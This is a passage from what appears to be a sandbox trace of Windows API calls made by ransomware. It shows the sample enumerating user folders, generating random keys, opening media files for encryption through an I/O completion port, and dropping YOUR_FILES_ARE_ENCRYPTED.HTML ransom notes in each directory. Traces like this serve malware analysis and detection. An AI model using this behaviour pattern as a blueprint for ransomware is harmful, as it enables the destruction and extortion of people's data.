(lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Z_cuynB3ZGeFf6DVUXD.avi" (normalized: "c:\\users\\5alr3u30d3\\videos\\riupxrt01pzmn5 8ov6f\\z_cuynb3zgeff6dvuxd.avi"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b4 [0168.963] GetFileSizeEx (in: hFile=0x5b4, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=86915) returned 1 [0168.963] GetProcessHeap () returned 0x270000 [0168.963] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x78c1c20 [0168.966] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="97") returned 2 [0168.966] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="CB") returned 2 [0168.966] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="9D") returned 2 [0168.966] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="94") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="0B") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="70") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="6A") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="C5") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="13") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="9E") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="F0") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="40") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="5B") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="14") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="16") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="8A") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="79") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="A2") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="31") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="84") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="A2") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="37") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="0D") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="5B") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="48") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="05") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="85") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="0C") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="A5") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="B6") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="DB") returned 2 [0168.967] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="39") returned 2 [0168.968] lstrcpyW (in: lpString1=0x78d1cd4, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Z_cuynB3ZGeFf6DVUXD.avi" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Z_cuynB3ZGeFf6DVUXD.avi") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Z_cuynB3ZGeFf6DVUXD.avi" [0168.968] CreateIoCompletionPort (FileHandle=0x5b4, ExistingCompletionPort=0x3a0, CompletionKey=0x78c1c20, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.968] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x78c1c20, lpOverlapped=0x78c1c20) returned 1 [0168.968] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2659cd70, ftCreationTime.dwHighDateTime=0x1d7e28b, ftLastAccessTime.dwLowDateTime=0xbfa0610, ftLastAccessTime.dwHighDateTime=0x1d7e43a, ftLastWriteTime.dwLowDateTime=0xbfa0610, ftLastWriteTime.dwHighDateTime=0x1d7e43a, nFileSizeHigh=0x0, nFileSizeLow=0x15383, dwReserved0=0xfe7bf02e, dwReserved1=0xffffffff, cFileName="Z_cuynB3ZGeFf6DVUXD.avi", cAlternateFileName="Z_CUYN~1.AVI")) returned 0 [0168.968] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0168.968] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 81 [0168.968] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\videos\\riupxrt01pzmn5 8ov6f\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5d8 [0168.969] WriteFile (in: hFile=0x5d8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0168.971] CloseHandle (hObject=0x5d8) returned 1 [0168.971] GetProcessHeap () returned 0x270000 [0168.972] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74081a0 | out: hHeap=0x270000) returned 1 [0168.972] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9226fc0, ftCreationTime.dwHighDateTime=0x1d7de7f, ftLastAccessTime.dwLowDateTime=0xf943a950, ftLastAccessTime.dwHighDateTime=0x1d7e249, ftLastWriteTime.dwLowDateTime=0xf943a950, ftLastWriteTime.dwHighDateTime=0x1d7e249, nFileSizeHigh=0x0, nFileSizeLow=0x2c76, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="TWmxUNch5jv08E.swf", cAlternateFileName="TWMXUN~1.SWF")) returned 1 [0168.972] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\TWmxUNch5jv08E.swf") returned 49 [0168.972] lstrcmpW (lpString1="TWmxUNch5jv08E.swf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.972] PathFindExtensionW (pszPath="TWmxUNch5jv08E.swf") returned=".swf" [0168.972] lstrlenW (lpString=".swf") returned 4 [0168.972] PathFindExtensionW (pszPath="TWmxUNch5jv08E.swf") returned=".swf" [0168.972] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dea6380, ftCreationTime.dwHighDateTime=0x1d7dc2d, ftLastAccessTime.dwLowDateTime=0x51cdd400, ftLastAccessTime.dwHighDateTime=0x1d7dd1e, ftLastWriteTime.dwLowDateTime=0x51cdd400, ftLastWriteTime.dwHighDateTime=0x1d7dd1e, nFileSizeHigh=0x0, nFileSizeLow=0x128b, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="X4ny7HQWCG093Ih87.flv", cAlternateFileName="X4NY7H~1.FLV")) returned 1 [0168.972] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\X4ny7HQWCG093Ih87.flv") returned 52 [0168.972] lstrcmpW (lpString1="X4ny7HQWCG093Ih87.flv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.972] PathFindExtensionW (pszPath="X4ny7HQWCG093Ih87.flv") returned=".flv" [0168.972] lstrlenW (lpString=".flv") returned 4 [0168.972] PathFindExtensionW (pszPath="X4ny7HQWCG093Ih87.flv") returned=".flv" [0168.972] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0168.972] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\X4ny7HQWCG093Ih87.flv" (normalized: "c:\\users\\5alr3u30d3\\videos\\x4ny7hqwcg093ih87.flv"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5d8 [0168.973] GetFileSizeEx (in: hFile=0x5d8, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=4747) returned 1 [0168.973] GetProcessHeap () returned 0x270000 [0168.973] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x78e9d78 [0168.986] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="0C") returned 2 [0168.986] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="50") returned 2 [0168.986] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="DB") returned 2 [0168.986] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="CC") returned 2 [0168.986] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="75") returned 2 [0168.986] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="9E") returned 2 [0168.986] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="CD") returned 2 [0168.986] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="3D") returned 2 [0168.986] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="2C") returned 2 [0168.987] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="6A") returned 2 [0168.987] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="46") returned 2 [0168.987] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="20") returned 2 [0168.987] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="0D") returned 2 [0168.987] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="5B") returned 2 [0168.987] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="96") returned 2 [0168.987] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="84") returned 2 [0168.987] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="04") returned 2 [0168.987] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="8D") returned 2 [0168.987] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="42") returned 2 [0168.987] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="92") returned 2 [0168.987] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="26") returned 2 [0168.987] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="AA") returned 2 [0168.987] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="B2") returned 2 [0168.987] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="07") returned 2 [0168.987] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="C3") returned 2 [0168.987] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="7E") returned 2 [0168.987] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="A6") returned 2 [0168.987] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="E5") returned 2 [0168.987] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="2D") returned 2 [0168.987] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="80") returned 2 [0168.987] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="36") returned 2 [0168.987] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="6A") returned 2 [0168.988] lstrcpyW (in: lpString1=0x78f9e2c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\X4ny7HQWCG093Ih87.flv" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\X4ny7HQWCG093Ih87.flv") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\X4ny7HQWCG093Ih87.flv" [0168.988] CreateIoCompletionPort (FileHandle=0x5d8, ExistingCompletionPort=0x3a0, CompletionKey=0x78e9d78, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.988] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x78e9d78, lpOverlapped=0x78e9d78) returned 1 [0168.988] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dea6380, ftCreationTime.dwHighDateTime=0x1d7dc2d, ftLastAccessTime.dwLowDateTime=0x51cdd400, ftLastAccessTime.dwHighDateTime=0x1d7dd1e, ftLastWriteTime.dwLowDateTime=0x51cdd400, ftLastWriteTime.dwHighDateTime=0x1d7dd1e, nFileSizeHigh=0x0, nFileSizeLow=0x128b, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="X4ny7HQWCG093Ih87.flv", cAlternateFileName="X4NY7H~1.FLV")) returned 0 [0168.988] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0168.988] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 60 [0168.988] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\videos\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0168.989] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0168.991] CloseHandle (hObject=0x5a0) returned 1 [0168.991] GetProcessHeap () returned 0x270000 [0168.992] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0168.992] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xaeba41e0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaeba41e0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Videos", cAlternateFileName="")) returned 0 [0168.992] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0168.992] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 53 [0168.992] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0168.993] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0168.995] CloseHandle (hObject=0x4a4) returned 1 [0168.995] GetProcessHeap () returned 0x270000 [0168.996] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74ea160 | out: hHeap=0x270000) returned 1 [0168.996] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x1765f29d, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x1765f29d, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x1765f29d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0168.996] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users") returned 22 [0168.996] GetProcessHeap () returned 0x270000 [0168.996] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74081a0 [0168.996] lstrcpyW (in: lpString1=0x74081a0, lpString2="\\\\?\\C:\\Users\\All Users" | out: lpString1="\\\\?\\C:\\Users\\All Users") returned="\\\\?\\C:\\Users\\All Users" [0168.996] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\*") returned="\\\\?\\C:\\Users\\All Users\\*" [0168.996] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xf9e4b61b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcd039ec0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcd039ec0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0168.997] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xf9e4b61b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcd039ec0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcd039ec0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0168.997] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x176f781e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x176f781e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x176f781e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0168.997] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Application Data") returned 39 [0168.997] GetProcessHeap () returned 0x270000 [0168.997] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74ea160 [0168.997] lstrcpyW (in: lpString1=0x74ea160, lpString2="\\\\?\\C:\\Users\\All Users\\Application Data" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Application Data") returned="\\\\?\\C:\\Users\\All Users\\Application Data" [0168.997] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Application Data", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Application Data\\*") returned="\\\\?\\C:\\Users\\All Users\\Application Data\\*" [0168.997] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Application Data\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x74081a0, ftCreationTime.dwLowDateTime=0x430df38, ftCreationTime.dwHighDateTime=0x75aba344, ftLastAccessTime.dwLowDateTime=0x18, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4ebdec0, ftLastWriteTime.dwHighDateTime=0x40, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="", cAlternateFileName="膠݀")) returned 0xffffffff [0168.997] GetProcessHeap () returned 0x270000 [0168.998] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74ea160 | out: hHeap=0x270000) returned 1 [0168.998] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x176ab55d, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x176ab55d, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x176ab55d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Desktop", cAlternateFileName="")) returned 1 [0168.998] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Desktop") returned 30 [0168.998] GetProcessHeap () returned 0x270000 [0168.998] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74ea160 [0168.998] lstrcpyW (in: lpString1=0x74ea160, lpString2="\\\\?\\C:\\Users\\All Users\\Desktop" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Desktop") returned="\\\\?\\C:\\Users\\All Users\\Desktop" [0168.998] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Desktop", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Desktop\\*") returned="\\\\?\\C:\\Users\\All Users\\Desktop\\*" [0168.998] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Desktop\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x74081a0, ftCreationTime.dwLowDateTime=0x430df38, ftCreationTime.dwHighDateTime=0x75aba344, ftLastAccessTime.dwLowDateTime=0x18, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4ebdec0, ftLastWriteTime.dwHighDateTime=0x40, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="", cAlternateFileName="膠݀")) returned 0xffffffff [0168.998] GetProcessHeap () returned 0x270000 [0168.999] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74ea160 | out: hHeap=0x270000) returned 1 [0168.999] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x176ab55d, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x176ab55d, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x176ab55d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0168.999] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Documents") returned 32 [0168.999] GetProcessHeap () returned 0x270000 [0168.999] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74ea160 [0168.999] lstrcpyW (in: lpString1=0x74ea160, lpString2="\\\\?\\C:\\Users\\All Users\\Documents" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Documents") returned="\\\\?\\C:\\Users\\All Users\\Documents" [0168.999] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Documents", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Documents\\*") returned="\\\\?\\C:\\Users\\All Users\\Documents\\*" [0168.999] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Documents\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x74081a0, ftCreationTime.dwLowDateTime=0x430df38, ftCreationTime.dwHighDateTime=0x75aba344, ftLastAccessTime.dwLowDateTime=0x18, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4ebdec0, ftLastWriteTime.dwHighDateTime=0x40, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="", cAlternateFileName="膠݀")) returned 0xffffffff [0168.999] GetProcessHeap () returned 0x270000 [0169.000] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74ea160 | out: hHeap=0x270000) returned 1 [0169.000] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x176ab55d, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x176ab55d, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x176ab55d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0169.000] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Favorites") returned 32 [0169.000] GetProcessHeap () returned 0x270000 [0169.000] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74ea160 [0169.000] lstrcpyW (in: lpString1=0x74ea160, lpString2="\\\\?\\C:\\Users\\All Users\\Favorites" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Favorites") returned="\\\\?\\C:\\Users\\All Users\\Favorites" [0169.000] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Favorites", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Favorites\\*") returned="\\\\?\\C:\\Users\\All Users\\Favorites\\*" [0169.000] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Favorites\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x74081a0, ftCreationTime.dwLowDateTime=0x430df38, ftCreationTime.dwHighDateTime=0x75aba344, ftLastAccessTime.dwLowDateTime=0x18, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4ebdec0, ftLastWriteTime.dwHighDateTime=0x40, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="", 